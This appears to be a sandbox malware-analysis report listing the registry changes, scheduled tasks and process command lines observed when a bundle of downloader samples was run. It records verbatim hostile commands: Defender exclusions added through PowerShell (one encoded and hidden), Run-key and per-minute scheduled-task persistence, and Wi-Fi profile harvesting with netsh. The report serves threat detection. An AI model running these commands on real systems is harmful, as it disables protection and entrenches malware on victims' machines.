| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ | C:\Windows\Explorer.EXE | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\rundll32.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap10417:140:7zEvent8427
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\*\" -spe -an -ai#7zMap1429:384:7zEvent28339
C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\347814563.exe
C:\Users\Admin\AppData\Local\Temp\347814563.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
C:\Users\Admin\AppData\Local\Temp\614016133.exe
C:\Users\Admin\AppData\Local\Temp\614016133.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5720 -ip 5720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 440
C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe
"C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
C:\Windows\system32\reg.exe
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUAByAG8AZAB1AGMAdAAuAGUAeABlADsA
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7296 -ip 7296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 440
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1989810276.exe
C:\Users\Admin\AppData\Local\Temp\1989810276.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe
"C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe
"C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe"
C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe"
C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe"
C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe
C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\OUCH_SOKHENG.pdf"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18CFB69F07F724E709E4166368633D9D --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=410FBA09A22902ABE057E6D4DEBDFF5C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=410FBA09A22902ABE057E6D4DEBDFF5C --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E3300027980912A10EC44DF1828698C5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A897585BE282A36C03503C698E57DE96 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2478C43556F96753CFBF5CAEEA5B95BB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2478C43556F96753CFBF5CAEEA5B95BB --renderer-client-id=6 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job /prefetch:1
